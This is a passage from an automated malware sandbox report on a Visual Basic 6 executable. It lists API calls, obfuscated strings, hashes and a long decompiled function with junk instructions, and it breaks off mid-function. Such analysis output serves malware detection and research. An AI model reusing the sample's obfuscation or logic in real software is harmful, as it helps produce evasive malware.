          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000001BC,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413B6D
          • __vbaVarMove.MSVBVM60(?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413BA9
          • __vbaVarAdd.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413BDB
          • __vbaVarMove.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413BE5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000704,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413C75
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413CDE
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413DD2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413E32
          • __vbaStrCopy.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413E64
          • __vbaFreeStr.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413EA4
          • __vbaVarTstLt.MSVBVM60(00008003,?,?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#), ref: 00413ECF
          • __vbaVarMove.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413F04
          • __vbaStrToAnsi.MSVBVM60(?,bangsternears,98E72E79,?,?,?,00000002,?,?,0000037B,?,0000037B), ref: 00413F3F
          • __vbaStrToAnsi.MSVBVM60(?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?,00000002,?), ref: 00413F6B
          • __vbaStrToAnsi.MSVBVM60(?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?), ref: 00413F7D
          • __vbaSetSystemError.MSVBVM60(00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79), ref: 00413F8E
          • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?), ref: 00413FC2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,?,?,00411A30), ref: 00413FFA
          • __vbaLateMemCallLd.MSVBVM60(?,?,M9uACtmJ7nAtSvje8kbN9w249,00000000), ref: 00414037
          • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414040
          • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041404D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 00414088
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 004140A2
          • __vbaFreeVar.MSVBVM60(00000000,?,00411AD0,0000000C), ref: 004140AD
          • __vbaStrToAnsi.MSVBVM60(?,bangsternears, 'y), ref: 004140D6
          • __vbaSetSystemError.MSVBVM60(00000000,?,bangsternears, 'y), ref: 004140E8
          • __vbaFreeStr.MSVBVM60(00000000,?,bangsternears, 'y), ref: 0041410D
          • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00414156
          • __vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 0041416A
          • __vbaLateMemCall.MSVBVM60(?,EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25,00000002,00000000,?,bangsternears, 'y), ref: 00414185
          • __vbaStrToAnsi.MSVBVM60(?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141A5
          • __vbaStrToAnsi.MSVBVM60(?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141B7
          • __vbaSetSystemError.MSVBVM60(8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 004141D7
          • __vbaFreeStrList.MSVBVM60(00000002,?,?,8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears), ref: 00414204
          • #716.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414233
          • __vbaChkstk.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041423B
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414254
          • __vbaFreeVar.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041425F
          • __vbaSetSystemError.MSVBVM60(98E72E79,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 0041428A
          • __vbaVarDup.MSVBVM60 ref: 004142C9
          • #600.MSVBVM60(?,00000002), ref: 004142D7
          • __vbaFreeVar.MSVBVM60(?,00000002), ref: 004142E8
          • __vbaSetSystemError.MSVBVM60(0058E1C9,00350DDE), ref: 00414309
          • __vbaVarDup.MSVBVM60(0058E1C9,00350DDE), ref: 00414381
          • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 004143A4
          • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 004143C7
          • __vbaStrCopy.MSVBVM60(0058E1C9,00350DDE), ref: 004143E1
          • __vbaStrToAnsi.MSVBVM60(?,00000000,0058E1C9,00350DDE), ref: 004143EE
          • __vbaSetSystemError.MSVBVM60(?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 0041440A
          • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 00414437
          • #532.MSVBVM60(LAANELOFTERNE,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414456
          • __vbaSetSystemError.MSVBVM60(000D2930,8904D3F8,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411A30), ref: 00414477
          • __vbaVarDup.MSVBVM60 ref: 004144AF
          • #529.MSVBVM60(?), ref: 004144BB
          • __vbaFreeVar.MSVBVM60(?), ref: 004144C6
          • __vbaStrToAnsi.MSVBVM60(?,Gooiest4), ref: 004144DE
          • __vbaSetSystemError.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004144F4
          • __vbaFreeStr.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414517
          • __vbaVarDup.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414555
          • #600.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414563
          • __vbaFreeVar.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414574
          • __vbaSetSystemError.MSVBVM60(0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041459A
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004145C9
          • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004145FC
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010), ref: 00414637
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000010), ref: 00414651
          • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414677
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000160), ref: 004146CC
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 004146F3
          • __vbaObjSet.MSVBVM60(?,?,incomprehensible), ref: 00414741
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 0041477C
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 00414796
          • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004147B2
          • __vbaVarDup.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041486D
          • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 004148A3
          • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 004148B0
          • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8), ref: 004148E8
          • __vbaStrToAnsi.MSVBVM60(?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414903
          • __vbaSetSystemError.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414914
          • __vbaFreeStr.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414937
          • #570.MSVBVM60(0000001C,00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414957
          • _CIcos.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041496B
          • __vbaFpR8.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414970
          • __vbaEnd.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414987
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$Error$System$Ansi$ChkstkList$CopyLate$Move$CallNew2$#600#716Addref$#516#529#532#570#581#595#596#664#676#680Icos
          • String ID: Ausones$Charcuterieganocephalantu$EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25$Filmselskabets$Gastriloquy$Gooiest4$LAANELOFTERNE$M9uACtmJ7nAtSvje8kbN9w249$NzXRmXMzPSdU58$Porto7$Statscheferstronhi8$Subskriptionen8$bangsternears$c$d$encryptions$incomprehensible$rebslagerierneshand$s[$samtaleemnetsrhes$solicit$sykofanter$t$)#
          • API String ID: 759312655-2082158243
          • Opcode ID: 2bddbde34037f444cc3a5a854415b24bea497ccdb230e0d1c98109061f9f0066
          • Instruction ID: 4a9a28434090fcadc7b4776753156bd0f1509fff4348be5e96b67bca76e501b3
          • Opcode Fuzzy Hash: 2bddbde34037f444cc3a5a854415b24bea497ccdb230e0d1c98109061f9f0066
          • Instruction Fuzzy Hash: 1E13C3B1901619EFDB21EF50CD89BDDBBB4BF04305F0041EAE508AA2A0D7799B94DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          [Figure: control-flow graph; legend: Executed, Not Executed]
          C-Code - Quality: 62%
          			E00406FFA(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, void* __edx) {
          				signed int _t592;
          				signed int _t612;
          				signed int _t616;
          				signed int _t638;
          				signed int _t645;
          				signed int _t659;
          				signed int _t663;
          				signed int _t669;
          				signed int _t681;
          				signed int _t687;
          				signed int _t704;
          				signed int _t709;
          				void* _t717;
          				void* _t718;
          				void* _t721;
          				void* _t725;
          				intOrPtr _t726;
          				short _t735;
          				void* _t742;
          				signed int _t743;
          				signed int _t749;
          				signed int _t751;
          				signed int _t757;
          				signed int _t758;
          				signed int _t762;
          				signed int _t763;
          				signed int _t767;
          				signed int _t785;
          				void* _t789;
          				void* _t794;
          				void* _t810;
          				void* _t811;
          				signed int _t814;
          				intOrPtr* _t817;
          				void* _t819;
          				void* _t821;
          				void* _t868;
          				void* _t869;
          				intOrPtr* _t870;
          				void* _t871;
          				void* _t872;
          				long long _t911;
          
          				_t817 = __ecx;
          				_push(ss);
          				asm("int 0xb0");
          				asm("lds eax, [eax]");
          				 *__ecx =  *__ecx + __edx;
          				 *__eax =  *__eax + __eax;
          				asm("adc [eax], eax");
          				 *__ecx =  *__ecx + __edx;
          				 *__eax =  *__eax + __eax;
          				asm("adc [eax], eax");
          				 *__ecx =  *__ecx + __edx;
          				 *__eax =  *__eax + __eax;
          				asm("adc [eax], eax");
          				 *__ecx =  *__ecx + __edx;
          				 *__eax =  *__eax + __eax;
          				asm("adc edx, edx");
          				if(__ebx + __ebx == 0) {
          					_push( *(_t868 - 0x250));
          					L00401906();
          				}
          				asm("jecxz 0x0");
          				 *((intOrPtr*)(_t817 - 0x2ab7b)) =  *((intOrPtr*)(_t817 - 0x2ab7b)) - 1;
          				asm("invalid");
          				_pop(es);
          				 *((intOrPtr*)(_t868 - 4)) = 0x28;
          				 *((short*)(_t868 - 0x228)) = 0x1a82;
          				 *((long long*)(_t868 - 0x244)) =  *0x4013f8;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x596b, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
          				 *((short*)(_t868 - 0x6c)) =  *((intOrPtr*)(_t868 - 0x22c));
          				 *((intOrPtr*)(_t868 - 4)) = 0x29;
          				 *((intOrPtr*)(_t868 - 0x230)) = 0x2329eb;
          				_t17 = _t868 - 0x230; // 0x2329eb
          				 *_t870 =  *0x4013f0;
          				_t592 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x70c))( *((intOrPtr*)(_t868 + 8)), _t817, _t817, _t17, 0x9d, 0x3b889c20, 0x5b06);
          				 *(_t868 - 0x250) = _t592;
          				if( *(_t868 - 0x250) >= 0) {
          					_t26 = _t868 - 0x2b0;
          					 *_t26 =  *(_t868 - 0x2b0) & 0x00000000;
          					__eflags =  *_t26;
          				} else {
          					_push(0x70c);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2b0) = _t592;
          				}
          				 *((intOrPtr*)(_t868 - 4)) = 0x2a;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x750))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244);
          				 *((long long*)(_t868 - 0x88)) =  *((long long*)(_t868 - 0x244));
          				 *((intOrPtr*)(_t868 - 4)) = 0x2b;
          				 *((short*)(_t868 - 0x228)) = 0x1fe;
          				 *((long long*)(_t868 - 0x244)) =  *0x4013e8;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x1d56, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
          				 *((short*)(_t868 - 0xdc)) =  *((intOrPtr*)(_t868 - 0x22c));
          				 *((intOrPtr*)(_t868 - 4)) = 0x2c;
          				 *((short*)(_t868 - 0x228)) = 0x37b;
          				 *((intOrPtr*)(_t868 - 0x230)) =  *0x4013e0;
          				 *_t870 =  *0x4013d8;
          				_t50 = _t868 - 0x230; // 0x2329eb
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x758))( *((intOrPtr*)(_t868 + 8)), _t50, 0xdbe6dc20, 0x5af4, _t868 - 0x228, _t817, _t817);
          				 *((intOrPtr*)(_t868 - 4)) = 0x2d;
          				_t612 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6fc))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228);
          				 *(_t868 - 0x250) = _t612;
          				if( *(_t868 - 0x250) >= 0) {
          					_t64 = _t868 - 0x2b4;
          					 *_t64 =  *(_t868 - 0x2b4) & 0x00000000;
          					__eflags =  *_t64;
          				} else {
          					_push(0x6fc);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2b4) = _t612;
          				}
          				 *((short*)(_t868 - 0xbc)) =  *((intOrPtr*)(_t868 - 0x228));
          				 *((intOrPtr*)(_t868 - 4)) = 0x2e;
          				_t616 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6f8))( *((intOrPtr*)(_t868 + 8)));
          				 *(_t868 - 0x250) = _t616;
          				if( *(_t868 - 0x250) >= 0) {
          					_t77 = _t868 - 0x2b8;
          					 *_t77 =  *(_t868 - 0x2b8) & 0x00000000;
          					__eflags =  *_t77;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2b8) = _t616;
          				}
          				 *((intOrPtr*)(_t868 - 4)) = 0x2f;
          				L004018F4();
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x728))( *((intOrPtr*)(_t868 + 8)), 0x8904d3f8, _t868 - 0x134, 0x742e, _t868 - 0x244);
          				 *((long long*)(_t868 - 0xd8)) =  *((long long*)(_t868 - 0x244));
          				_t819 = _t868 - 0x134;
          				L00401924();
          				 *((intOrPtr*)(_t868 - 4)) = 0x30;
          				 *((intOrPtr*)(_t868 - 0x230)) = 0x8904d3f8;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x740))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, 0x98e72e79, _t868 - 0x244);
          				 *((intOrPtr*)(_t868 - 0xd0)) =  *((intOrPtr*)(_t868 - 0x244));
          				 *((intOrPtr*)(_t868 - 0xcc)) =  *((intOrPtr*)(_t868 - 0x240));
          				 *((intOrPtr*)(_t868 - 4)) = 0x31;
          				 *((long long*)(_t868 - 0x244)) =  *0x4013d0;
          				 *_t870 =  *0x4013c8;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x754))( *((intOrPtr*)(_t868 + 8)), 0x3a20, _t868 - 0x244, _t819, _t868 - 0x228);
          				 *((short*)(_t868 - 0xa8)) =  *((intOrPtr*)(_t868 - 0x228));
          				 *((intOrPtr*)(_t868 - 4)) = 0x32;
          				_t638 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x710))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244);
          				 *(_t868 - 0x250) = _t638;
          				if( *(_t868 - 0x250) >= 0) {
          					_t119 = _t868 - 0x2bc;
          					 *_t119 =  *(_t868 - 0x2bc) & 0x00000000;
          					__eflags =  *_t119;
          				} else {
          					_push(0x710);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2bc) = _t638;
          				}
          				 *((intOrPtr*)(_t868 - 0xf8)) =  *((intOrPtr*)(_t868 - 0x244));
          				 *((intOrPtr*)(_t868 - 0xf4)) =  *((intOrPtr*)(_t868 - 0x240));
          				 *((intOrPtr*)(_t868 - 4)) = 0x33;
          				 *((long long*)(_t868 - 0x244)) =  *0x4013c0;
          				_t645 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x708))( *((intOrPtr*)(_t868 + 8)), 0x98e72e79, _t868 - 0x244, 0x3457, 0x98e72e79, _t868 - 0x24c);
          				 *(_t868 - 0x250) = _t645;
          				if( *(_t868 - 0x250) >= 0) {
          					_t137 = _t868 - 0x2c0;
          					 *_t137 =  *(_t868 - 0x2c0) & 0x00000000;
          					__eflags =  *_t137;
          				} else {
          					_push(0x708);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2c0) = _t645;
          				}
          				 *((intOrPtr*)(_t868 - 0x128)) =  *((intOrPtr*)(_t868 - 0x24c));
          				 *((intOrPtr*)(_t868 - 0x124)) =  *((intOrPtr*)(_t868 - 0x248));
          				 *((intOrPtr*)(_t868 - 4)) = 0x34;
          				 *((long long*)(_t868 - 0x244)) =  *0x4013b8;
          				 *_t870 =  *0x4013b4;
          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x754))( *((intOrPtr*)(_t868 + 8)), 0x2821, _t868 - 0x244, _t819, _t868 - 0x228);
          				 *((short*)(_t868 - 0xa4)) =  *((intOrPtr*)(_t868 - 0x228));
          				 *((intOrPtr*)(_t868 - 4)) = 0x35;
          				 *((short*)(_t868 - 0x228)) = 0x4ea1;
          				 *((intOrPtr*)(_t868 - 0x230)) = 0x8904d3f8;
          				_t659 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x714))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, _t868 - 0x228, _t868 - 0x234);
          				 *(_t868 - 0x250) = _t659;
          				if( *(_t868 - 0x250) >= 0) {
          					_t166 = _t868 - 0x2c4;
          					 *_t166 =  *(_t868 - 0x2c4) & 0x00000000;
          					__eflags =  *_t166;
          				} else {
          					_push(0x714);
          					_push(0x4105e8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2c4) = _t659;
          				}
          				 *((intOrPtr*)(_t868 - 0xc8)) =  *((intOrPtr*)(_t868 - 0x234));
          				 *((intOrPtr*)(_t868 - 4)) = 0x36;
          				L004018EE();
          				 *((intOrPtr*)(_t868 - 4)) = 0x37;
          				_t663 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x1b8))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228, 0xffffffff);
          				asm("fclex");
          				 *(_t868 - 0x250) = _t663;
          				if( *(_t868 - 0x250) >= 0) {
          					_t181 = _t868 - 0x2c8;
          					 *_t181 =  *(_t868 - 0x2c8) & 0x00000000;
          					__eflags =  *_t181;
          				} else {
          					_push(0x1b8);
          					_push(0x4105b8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x250));
          					L00401906();
          					 *(_t868 - 0x2c8) = _t663;
          				}
          				_t669 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x1bc))( *((intOrPtr*)(_t868 + 8)), 0);
          				asm("fclex");
          				 *(_t868 - 0x254) = _t669;
          				if( *(_t868 - 0x254) >= 0) {
          					_t192 = _t868 - 0x2cc;
          					 *_t192 =  *(_t868 - 0x2cc) & 0x00000000;
          					__eflags =  *_t192;
          				} else {
          					_push(0x1bc);
          					_push(0x4105b8);
          					_push( *((intOrPtr*)(_t868 + 8)));
          					_push( *(_t868 - 0x254));
          					L00401906();
          					 *(_t868 - 0x2cc) = _t669;
          				}
          				 *((intOrPtr*)(_t868 - 4)) = 0x38;
          				 *(_t868 - 0x1bc) =  *(_t868 - 0x1bc) & 0x00000000;
          				 *(_t868 - 0x1b8) =  *(_t868 - 0x1b8) & 0x00000000;
          				 *((intOrPtr*)(_t868 - 0x1c4)) = 6;
          				L004018E8();
          				while(1) {
          					 *((intOrPtr*)(_t868 - 4)) = 0x3a;
          					 *(_t868 - 0x1bc) = 1;
          					 *((intOrPtr*)(_t868 - 0x1c4)) = 2;
          					L004018E2();
          					_t821 = _t868 - 0x80;
          					L004018E8();
          					 *((intOrPtr*)(_t868 - 4)) = 0x3b;
          					 *((short*)(_t868 - 0x228)) = 0x1e2c;
          					 *((intOrPtr*)(_t868 - 0x230)) =  *0x4013b0;
          					 *_t870 =  *0x4013a8;
          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x758))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230, 0x539a9640, 0x5af4, _t868 - 0x228, _t821, _t821, _t868 - 0x154, _t868 - 0x1c4, _t868 - 0x80);
          					 *((intOrPtr*)(_t868 - 4)) = 0x3c;
          					_t681 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x704))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230);
          					 *(_t868 - 0x250) = _t681;
          					if( *(_t868 - 0x250) >= 0) {
          						_t227 = _t868 - 0x2d0;
          						 *_t227 =  *(_t868 - 0x2d0) & 0x00000000;
          						__eflags =  *_t227;
          					} else {
          						_push(0x704);
          						_push(0x4105e8);
          						_push( *((intOrPtr*)(_t868 + 8)));
          						_push( *(_t868 - 0x250));
          						L00401906();
          						 *(_t868 - 0x2d0) = _t681;
          					}
          					 *((intOrPtr*)(_t868 - 0x60)) =  *((intOrPtr*)(_t868 - 0x230));
          					 *((intOrPtr*)(_t868 - 4)) = 0x3d;
          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x738))( *((intOrPtr*)(_t868 + 8)));
          					 *((intOrPtr*)(_t868 - 4)) = 0x3e;
          					_t687 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6f8))( *((intOrPtr*)(_t868 + 8)));
          					 *(_t868 - 0x250) = _t687;
          					if( *(_t868 - 0x250) >= 0) {
          						_t244 = _t868 - 0x2d4;
          						 *_t244 =  *(_t868 - 0x2d4) & 0x00000000;
          						__eflags =  *_t244;
          					} else {
          						_push(0x6f8);
          						_push(0x4105e8);
          						_push( *((intOrPtr*)(_t868 + 8)));
          						_push( *(_t868 - 0x250));
          						L00401906();
          						 *(_t868 - 0x2d4) = _t687;
          					}
          					 *((intOrPtr*)(_t868 - 4)) = 0x3f;
          					 *((short*)(_t868 - 0x228)) = 0x1854;
          					 *((long long*)(_t868 - 0x244)) =  *0x401458;
          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x724))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x244, 0xbb1ac, _t868 - 0x228, _t868 - 0x24c);
          					 *((long long*)(_t868 - 0x120)) =  *((long long*)(_t868 - 0x24c));
          					 *((intOrPtr*)(_t868 - 4)) = 0x40;
          					 *((short*)(_t868 - 0x228)) = 0x5bd9;
          					 *((long long*)(_t868 - 0x244)) =  *0x401450;
          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x73c))( *((intOrPtr*)(_t868 + 8)), 0x37b, _t868 - 0x244, _t868 - 0x228, _t868 - 0x22c);
          					 *((short*)(_t868 - 0x118)) =  *((intOrPtr*)(_t868 - 0x22c));
          					 *((intOrPtr*)(_t868 - 4)) = 0x41;
          					_t704 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x6fc))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228);
          					 *(_t868 - 0x250) = _t704;
          					if( *(_t868 - 0x250) >= 0) {
          						_t278 = _t868 - 0x2d8;
          						 *_t278 =  *(_t868 - 0x2d8) & 0x00000000;
          						__eflags =  *_t278;
          					} else {
          						_push(0x6fc);
          						_push(0x4105e8);
          						_push( *((intOrPtr*)(_t868 + 8)));
          						_push( *(_t868 - 0x250));
          						L00401906();
          						 *(_t868 - 0x2d8) = _t704;
          					}
          					 *((short*)(_t868 - 0x114)) =  *((intOrPtr*)(_t868 - 0x228));
          					 *((intOrPtr*)(_t868 - 4)) = 0x42;
          					_t709 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x718))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x230);
          					 *(_t868 - 0x250) = _t709;
          					if( *(_t868 - 0x250) >= 0) {
          						_t292 = _t868 - 0x2dc;
